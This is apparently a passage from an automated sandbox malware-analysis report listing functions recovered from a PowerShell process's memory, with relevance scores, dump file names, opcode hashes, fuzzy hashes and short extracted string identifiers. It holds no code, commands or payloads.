                                                                                      • Instruction ID: e215ae04f61723d128df1b553d60bf2ad1a539b4906fa37ced572263c0689df1
                                                                                      • Opcode Fuzzy Hash: e02ed70211869ba88700c5b98635c8d46633ec3458b15a4874ff67e6fe2743e7
                                                                                      • Instruction Fuzzy Hash: E3B0928B90E6C10EE3824A2828225512E927E6250431D00EAC0D48629BA488AA099219
                                                                                      Function 00007FF95A2A6C89 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P>XZ
                                                                                      • API String ID: 0-1029732242
                                                                                      • Opcode ID: 9424cf754106145bb488168ed473e8e184e36bdcee55e26b52eab37ef9f9acc5
                                                                                      • Instruction ID: 763f520e0a043fae4f4642879b2084a9997aad5990df3aafe9fa5b7daa8819bc
                                                                                      • Opcode Fuzzy Hash: 9424cf754106145bb488168ed473e8e184e36bdcee55e26b52eab37ef9f9acc5
                                                                                      • Instruction Fuzzy Hash: 0981253190CB894FDB56DB2898557E9BFE1FF56320F0842AED089C7193DBA4A806C781
                                                                                      Function 00007FF95A2A5CAF Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0~XZ
                                                                                      • API String ID: 0-1994132817
                                                                                      • Opcode ID: 18158eecdf89975f6d194aa0e2d4c8f2dbafa64e53f945b44733ea453c7123fb
                                                                                      • Instruction ID: 6051a7b943c9dc22ab4dd99d6e43171774423d3690bcb84f7dba28ff514435f5
                                                                                      • Opcode Fuzzy Hash: 18158eecdf89975f6d194aa0e2d4c8f2dbafa64e53f945b44733ea453c7123fb
                                                                                      • Instruction Fuzzy Hash: 9051D335E1CA4A4BEB68D73448567BA76D1EFA5300F5801BDC40ED35C6EEE8B8059784
                                                                                      Function 00007FF95A2A6EB6 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 7963f56fdf7d1676f6647ebfd5f586064b46fbd3a77814124db58cb0ff4df89c
                                                                                      • Instruction ID: 7a23b7b18e640e6c538fe57406d3bda61fbe69def8feaf44ef0793c2202eaa19
                                                                                      • Opcode Fuzzy Hash: 7963f56fdf7d1676f6647ebfd5f586064b46fbd3a77814124db58cb0ff4df89c
                                                                                      • Instruction Fuzzy Hash: D351693190D7894FD719DB2898577E97BD1EF56324F0802FEC099CB1D2CEA9B4128386
                                                                                      Function 00007FF95A2A936D Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P>XZ
                                                                                      • API String ID: 0-1029732242
                                                                                      • Opcode ID: cc0e43bae1f6c6ede8cb7d3b20ab3ddad540caf0b71c97ecd012f1a2250c624d
                                                                                      • Instruction ID: b614002a234d53b98b9240ef8a54d720c600d46f2fd5b4fae5247d2db3388e0a
                                                                                      • Opcode Fuzzy Hash: cc0e43bae1f6c6ede8cb7d3b20ab3ddad540caf0b71c97ecd012f1a2250c624d
                                                                                      • Instruction Fuzzy Hash: 69518431E1C9094FDB58EB2898567F9B3E1FF98310F5441FAD40EC3692DEA8B9458B80
                                                                                      Function 00007FF95A2A6EDF Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 2e16cb5c2abc62c1091eec86083e8a28d82a12f5780c6cfedaf2a4b517b75ecc
                                                                                      • Instruction ID: a295cf6ed66eab93c50d05d2b920a27b65db500eb42a7e3ab7a42ec22b631f43
                                                                                      • Opcode Fuzzy Hash: 2e16cb5c2abc62c1091eec86083e8a28d82a12f5780c6cfedaf2a4b517b75ecc
                                                                                      • Instruction Fuzzy Hash: 47414321C0C7D94FE715CB2848927A97FE1AF12214F0C46FDC4AACB5D2DAE9700AC395
                                                                                      Function 00007FF95A2A93F2 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P>XZ
                                                                                      • API String ID: 0-1029732242
                                                                                      • Opcode ID: a419e77e1f9f0e8fbf16451e49761c9a9d3a386593303aa8f0fdcf99c39a527d
                                                                                      • Instruction ID: 3e2b9083eb75c7a3248793f7b702f28af56a3b8fe5c02e8558ab0e205a6538b0
                                                                                      • Opcode Fuzzy Hash: a419e77e1f9f0e8fbf16451e49761c9a9d3a386593303aa8f0fdcf99c39a527d
                                                                                      • Instruction Fuzzy Hash: CA416331A289095FDB59EB28C4567F9B3E1FF98300F4441F9D40EC3686DEB4BA458B81
                                                                                      Function 00007FF95A2A6ABF Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PpXZ
                                                                                      • API String ID: 0-1197791064
                                                                                      • Opcode ID: dd626504394118a98e1260175a85f1813072800e26d91e84c753806606788d64
                                                                                      • Instruction ID: 09d7b24c84c952b35efb49f96e4781e9db091ff08d9dca0c074db31a09652e3a
                                                                                      • Opcode Fuzzy Hash: dd626504394118a98e1260175a85f1813072800e26d91e84c753806606788d64
                                                                                      • Instruction Fuzzy Hash: 00413E71908A1D8FDF54DB48D885BE9B3F1FF64310F108699C04EE7241DA74AA85CF85
                                                                                      Function 00007FF95A2A6EF8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 4dc33cdac971e7a684f6ac60e01d79b61607e20fe24867e7380206cef8f7ffe3
                                                                                      • Instruction ID: f6287be46b36893cc7b1265190bc48b0ffab03d8de7c8f7149489e1b755e218e
                                                                                      • Opcode Fuzzy Hash: 4dc33cdac971e7a684f6ac60e01d79b61607e20fe24867e7380206cef8f7ffe3
                                                                                      • Instruction Fuzzy Hash: 7B314531D0CA994BEB59CB2898937ED7BE1EF11324F1802FCC49AC71C2CAA974068385
                                                                                      Function 00007FF95A2A6F11 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 0f72cea58703fcd4cdad472439feab1c873898c08263a89710c55110932f9a74
                                                                                      • Instruction ID: abf514b09cccd605c581217a8ffc1f91aa7d805511cb578932a6523c0ad77754
                                                                                      • Opcode Fuzzy Hash: 0f72cea58703fcd4cdad472439feab1c873898c08263a89710c55110932f9a74
                                                                                      • Instruction Fuzzy Hash: 6D212625D0C6994AEB58CB2898937EC7BE1EF11314F0803FCD59AC75C2CAA975168389
                                                                                      Function 00007FF95A2A5D10 Relevance: .2, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bede55041f83bc06d82ae01f2fac39cb0690f54d8972d47f991210b902c63a25
                                                                                      • Instruction ID: a2bf8784a2d5350c72a55cec82fb90cc8ce10286afd3fc996f89249f8965254f
                                                                                      • Opcode Fuzzy Hash: bede55041f83bc06d82ae01f2fac39cb0690f54d8972d47f991210b902c63a25
                                                                                      • Instruction Fuzzy Hash: CC61D235E1CA4A4BEB68E73848567BE76D1EFA5300F5801BDD40ED35C2EEE8B8059784
                                                                                      Function 00007FF95A2A5C82 Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c26425008a8f0f0ec434a05c824cdbe386f17ad988ec498fc97becace12253b
                                                                                      • Instruction ID: ce792481933f9657781e6a6ec1bff6f045d5ad3f6dd48a57804f69144271cf8a
                                                                                      • Opcode Fuzzy Hash: 9c26425008a8f0f0ec434a05c824cdbe386f17ad988ec498fc97becace12253b
                                                                                      • Instruction Fuzzy Hash: A861E222E0CA8A4BEB65D73448167BA7AE1EF61300F5801FEC44ED75C6EDE8B8059784
                                                                                      Function 00007FF95A2A5D20 Relevance: .2, Instructions: 187COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b10058a1111983da0aabc9761075501ec4c6caa7d3f065f761b38b8d5046993e
                                                                                      • Instruction ID: 69e11e5f84a6360de04ba2557a938ef483e8989757133952d8e738150c8301da
                                                                                      • Opcode Fuzzy Hash: b10058a1111983da0aabc9761075501ec4c6caa7d3f065f761b38b8d5046993e
                                                                                      • Instruction Fuzzy Hash: A351C131E1CA4A4BEB68D73488567BA76D1EFA5304F5801BDD40ED35C2EEF8B8059784
                                                                                      Function 00007FF95A2A97E9 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 25773e2a6df7ce4ed963953f56a11ec7c4cf431e560d04d7044ff95c25af6387
                                                                                      • Instruction ID: 693ffebacbf4d41caf159cd92eb1b4fd7d41cded60bb80280ee3aa4a4c7afc5f
                                                                                      • Opcode Fuzzy Hash: 25773e2a6df7ce4ed963953f56a11ec7c4cf431e560d04d7044ff95c25af6387
                                                                                      • Instruction Fuzzy Hash: BB319531A0C7858FD790DB78D4497AABBE0EF99310F044ABFE088C3252DAB4E585C746
                                                                                      Function 00007FF95A2A9800 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc4bec5abaa872bb25b088bc04ca0244f73a45c0139ce2800e31e061e300c1ba
                                                                                      • Instruction ID: 494d3561d08efcfe9b8dfc4e14e165c600c668d42b2ad5784c2345af650226ea
                                                                                      • Opcode Fuzzy Hash: dc4bec5abaa872bb25b088bc04ca0244f73a45c0139ce2800e31e061e300c1ba
                                                                                      • Instruction Fuzzy Hash: 6011E931A086498FD750EF79C489A6AB7E1EF98310F144F7ED449C3261DEB4E480C781
                                                                                      Function 00007FF95A2A52D8 Relevance: .0, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a026684aaa7db869824f2973239a328418b076a754aadf60cb19ca03f986f93d
                                                                                      • Instruction ID: 8775bf3f41bce75dc843108ef777abb62f6999747bff5a9d90e106c832642006
                                                                                      • Opcode Fuzzy Hash: a026684aaa7db869824f2973239a328418b076a754aadf60cb19ca03f986f93d
                                                                                      • Instruction Fuzzy Hash: D501843190860A8BEB68E764C856BBE76F1EF51310F14017DD00AE34D2DEA47841DB45
                                                                                      Function 00007FF95A2A33B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51aece7dbb89ad7ea954680a06e782dfa3413f05ecb7fbb035b8477b7832b68d
                                                                                      • Instruction ID: f674e717b977c340ac4a0b3ffdf73dc058fe870140a2290d5243f247723502d3
                                                                                      • Opcode Fuzzy Hash: 51aece7dbb89ad7ea954680a06e782dfa3413f05ecb7fbb035b8477b7832b68d
                                                                                      • Instruction Fuzzy Hash: 0701447111CB0D8FD744EF0CE451AA5B7E0FB95324F10056DE58AC3651DA36E882CB46
                                                                                      Function 00007FF95A2A5B51 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b535784eabab95be48be37c70e039018f4b16594bff043aef3f0d3b08e69866
                                                                                      • Instruction ID: 4d9dd5a5c89f966adfd24365c685bb1436a41ec78a4e1138a5927e9128a835a3
                                                                                      • Opcode Fuzzy Hash: 3b535784eabab95be48be37c70e039018f4b16594bff043aef3f0d3b08e69866
                                                                                      • Instruction Fuzzy Hash: 96012BA180EB855FE357D73C585A3A27FE0DFAA13070C46FFC089CB457D95858468396
                                                                                      Function 00007FF95A2A5B70 Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f9ab334cbbffa2c920bcd81d15d33147fa411a717c18d55ae982e926af7e9bf3
                                                                                      • Instruction ID: 44a1a98dbde81787b8bbaf347e153a5e65f753877ba9eae9a5123a9f0060acd6
                                                                                      • Opcode Fuzzy Hash: f9ab334cbbffa2c920bcd81d15d33147fa411a717c18d55ae982e926af7e9bf3
                                                                                      • Instruction Fuzzy Hash: 86F027B190DF081FE7A8EB3C54493A777E0DFAD220B0847BFC049C315ADE6468068380

                                                                                      Non-executed Functions

                                                                                      Function 00007FF95A2A5467 Relevance: 11.6, Strings: 9, Instructions: 348COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: 91b12561de748826363ca3d49e3bbfd525f8d783332e9c87081ca4fa96400f15
                                                                                      • Instruction ID: 36edc787b1ee953bf249f530d962b8d7765588a27449df67172673e47e65b4ed
                                                                                      • Opcode Fuzzy Hash: 91b12561de748826363ca3d49e3bbfd525f8d783332e9c87081ca4fa96400f15
                                                                                      • Instruction Fuzzy Hash: 4C91E8ABE1D2511FE301EA2DF8555F92BE4DFC1B7071841FBD188CA0D7E958690E42B4
                                                                                      Function 00007FF95A2A5548 Relevance: 11.5, Strings: 9, Instructions: 238COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: ff0239e9ce4a16ce01d43d19ab4828e1eca2e65f8d7ff624c992392c9bc85b24
                                                                                      • Instruction ID: 787ac15b023f05a17b011c31e6c14981911fd60b758d7b8fcd16c898079e77e0
                                                                                      • Opcode Fuzzy Hash: ff0239e9ce4a16ce01d43d19ab4828e1eca2e65f8d7ff624c992392c9bc85b24
                                                                                      • Instruction Fuzzy Hash: 985108ABE0D5921FF311E62DB8566FA2BD4DFD1F7031841FFD188CA0DBE858690A41A4
                                                                                      Function 00007FF95A2A5590 Relevance: 11.4, Strings: 9, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: 931c63f78dbf0d64dab7188a749b47c2732c27e83390eef33809cab8c82f373c
                                                                                      • Instruction ID: f75e4e88e7bf0218a6fab719a48fd39990ce90c0e7a9fc97e40cb36afc4687fd
                                                                                      • Opcode Fuzzy Hash: 931c63f78dbf0d64dab7188a749b47c2732c27e83390eef33809cab8c82f373c
                                                                                      • Instruction Fuzzy Hash: 6151E69BE0D6821FF311D62DBC5A6F61BD4EFD1E7071841FFD188CA0DBE988690A41A4
                                                                                      Function 00007FF95A2A55B0 Relevance: 11.4, Strings: 9, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: 6b814c12b0f493bcb79c2ddf4dbfd10d5d3e2f9a633d936d886b9c52c6f6cacd
                                                                                      • Instruction ID: 989486da230c412d356aed5ac7de70d10869c5335643cc4c780c2c547af08e62
                                                                                      • Opcode Fuzzy Hash: 6b814c12b0f493bcb79c2ddf4dbfd10d5d3e2f9a633d936d886b9c52c6f6cacd
                                                                                      • Instruction Fuzzy Hash: 6C41D79BE0D6820FF311D62C7C5A6F62BD4EFD1E7071841FFD088CA0DBA998690A41A5
                                                                                      Function 00007FF95A2A5600 Relevance: 11.4, Strings: 9, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: ac06ff9099a0b42755ddefacc92c610e232e4acc622f4d19e2d6a7995f15929f
                                                                                      • Instruction ID: 39b0b81a59888a49cd32a79e30bdd3f871060bca29152430c81b6d897eb2965b
                                                                                      • Opcode Fuzzy Hash: ac06ff9099a0b42755ddefacc92c610e232e4acc622f4d19e2d6a7995f15929f
                                                                                      • Instruction Fuzzy Hash: BE31EBABE0D5820FF211D72C784A6761BD4EFD1F2072C41FED08CD60DBB998690A4199
                                                                                      Function 00007FF95A2A5608 Relevance: 11.4, Strings: 9, Instructions: 130COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-3855964570
                                                                                      • Opcode ID: 21e1bce00d4b09ae32735ad74ef8dc2046a52f25e5279a0c8721e61cdffa0f85
                                                                                      • Instruction ID: bc323a04e2e063bc243f557e11c2f6ed5651e7379940746dbd261300deadbd88
                                                                                      • Opcode Fuzzy Hash: 21e1bce00d4b09ae32735ad74ef8dc2046a52f25e5279a0c8721e61cdffa0f85
                                                                                      • Instruction Fuzzy Hash: 4031B8ABE0D5820FF211DB2C785A6761FD4EFD1F6072C41FED08C960DBB99C69064199
                                                                                      Function 00007FF95A2A5618 Relevance: 10.1, Strings: 8, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (uXZ$0sXZ$PtXZ$puXZ$xsXZ$R_I$rXZ$tXZ
                                                                                      • API String ID: 0-2180984819
                                                                                      • Opcode ID: 4f2d41030c3413d349fa9b60d56b3e9dc73cac1f2fde3051a35d3bf5d39b2e38
                                                                                      • Instruction ID: cf768c0afbcdb384671365797d015bcaf628b5b970809f49943f09203538d205
                                                                                      • Opcode Fuzzy Hash: 4f2d41030c3413d349fa9b60d56b3e9dc73cac1f2fde3051a35d3bf5d39b2e38
                                                                                      • Instruction Fuzzy Hash: 6E31C9ABE0E5820FF210CB2C785A6761BD4AFD1F2072C41FED08C960DBB99CBD065159
                                                                                      Function 00007FF95A2A5877 Relevance: 5.1, Strings: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001A.00000002.7697947026.00007FF95A2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A2A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_26_2_7ff95a2a0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0~XZ$X}XZ$R_I$}XZ
                                                                                      • API String ID: 0-3426520714
                                                                                      • Opcode ID: 6683ef00c73a9bb7a03dbd1fb7785c56e2a6caf985fb2881906eab07050ea438
                                                                                      • Instruction ID: 620652cdaf5a7d538058c5eadbae40c6961a0732ab309b04bedb41db71e119e3
                                                                                      • Opcode Fuzzy Hash: 6683ef00c73a9bb7a03dbd1fb7785c56e2a6caf985fb2881906eab07050ea438
                                                                                      • Instruction Fuzzy Hash: 1711D29BE0E5C30FF211C72C385667A1FC4BFC1A30B2D84FED0848B09B699C68065294

                                                                                      Non-executed Functions

                                                                                      Function 00007FF68B22DB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000002B.00000002.8187670697.00007FF68B171000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF68B170000, based on PE: true
                                                                                      • Associated: 0000002B.00000002.8187605459.00007FF68B170000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8189432745.00007FF68B676000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8190072582.00007FF68B838000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8190072582.00007FF68B97C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8191370702.00007FF68BBD0000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8191445038.00007FF68BBD2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 0000002B.00000002.8191445038.00007FF68BBF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
